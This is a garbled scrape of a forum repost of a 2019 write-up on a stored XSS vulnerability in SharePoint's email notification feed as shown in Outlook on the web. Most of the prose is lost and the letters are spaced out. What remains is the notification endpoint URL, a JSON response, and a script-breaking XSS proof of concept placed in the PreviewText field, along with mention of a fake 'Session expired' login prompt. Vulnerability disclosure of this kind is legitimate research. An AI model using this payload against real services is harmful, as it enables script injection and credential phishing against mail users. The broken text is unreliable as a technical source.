[13940] 2019-04-02_SharePoint邮件通知服务中的XSS漏洞

文档创建者:s7ckTeam
浏览次数:15
最后更新:2025-01-18
2019-04-02_SharePoint邮件通知服务中的XSS漏洞 S h a r e P o i n t X S S c l o u d s   F r e e B u f   2 0 1 9 - 0 4 - 0 2 X S S   O W A S P T o p   1 0   X S S T a r g e t 线 线 S h a r e P o i n t X S S T a r g e t * * S h a r e P o i n t * * S h a r e P o i n t   O f f i c e   3 6 5 O u t l o o k E x c e l W o r d 线 w e b P o r t a l S h a r e P o i n t w e b 使 S h a r e P o i n t w e b L y n c S k y p e S h a r e P o i n t 使 T a r g e t X S S S h a r e P o i n t P a y l o a d S h a r e P o i n t X S S
S h a r e P o i n t U R L G E T 便 h t t p s : / / o u t l o o k . o f f i c e 3 6 5 . c o m / o w a / e v . o w a 2 ? n s = P e n d i n g R e q u e s t & e v = P e n d i n g N o t i f i c a t i o n R e q u e s t & U A = 0 & c i d = [ c i d ] & X - S u i t e S e r v i c e P r o x y O r i g i n = h t t p s : / / [ c o m p a n y ] . s h a r e p o i n t . c o m   S h a r e P o i n t J S O N S h a r e P o i n t P r e v i e w T e x t <   >   /   S h a r e P o i n t         h e l l o ` ) * * X S S   P a y l o a d s c r i p t X S S P o C 1 H T T P / 1 . 1   2 0 0   O K [ T R U N C A T E D ] < s c r i p t > [ { " _ _ t y p e " : " N e w M a i l N o t i f i c a t i o n P a y l o a d : # E x c h a n g e " , " i d " : " N e w M a i l N o t i f i c a t i o n " , " S e n d e r " : " S e n d e r I n f o r m a t i o n " , " S u b j e c t " : " E m a i l   S u b j e c t " , " P r e v i e w T e x t " : " P r e v i e w   T e x t " , " I t e m I d " : " [ i t e m I D ] " , " C o n v e r s a t i o n I d " : " [ c o n v e r s a t i o n I D ] " , " I s C l u t t e r " : f a l s e , " S e n d e r S m t p E m a i l A d d r e s s " : " j o h n d o e @ e x a m p l e . c o m " , " I n f e r e n c e C l a s s i f i c a t i o n " : " F o c u s e d " , " E v e n t T y p e " : " 0 " } ] < / s c r i p t > X S S   P a y l o a d   * * < / s c r i p t > < s c r i p t > a l e r t ( < s c r i p t > [ { " _ _ t y p e " : " N e w M a i l N o t i f i c a t i o n P a y l o a d : # E x c h a n g e " , " i d " : " N e w M a i l N o t i f i c a t i o n " , " S e n d e r " : " S e n d e r I n f o r m a t i o n " , " S u b j e c t " : " E m a i l   S u b j e c t " , " P r e v i e w T e x t " : " < / s c r i p t > < s c r i p t > a l e r t ( ` h e l l o ` ) < / s c r i p t > " , " I t e m I d " : " [ i t e m I D ] " , " C o n v e r s a t i o n I d " : " [ c o n v e r s a t i o n I D ] " , " I s C l u t t e r " : f a l s e , " S e n d e r S m t p E m a i l A d d r e s s " : " j o h n d o e @ e x a m p l e . c o m " , " I n f e r e n c e C l a s s i f i c a t i o n " : " F o c u s e d " , " E v e n t T y p e " : " 0 " } ] < / s c r i p t >
2 S h a r e P o i n t   S h a r e P o i n t P a y l o a d S e s s i o n   e x p i r e d P l e a s e   l o g   i n       a g a i n 3 O K X S S   P a y l o a d
S h a r e P o i n t S h a r e P o i n t P a y l o a d T a r g e t P o C 使 X S S S h a r e P o i n t * t a r g e t c l o u d s F r e e B u f . C O M

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则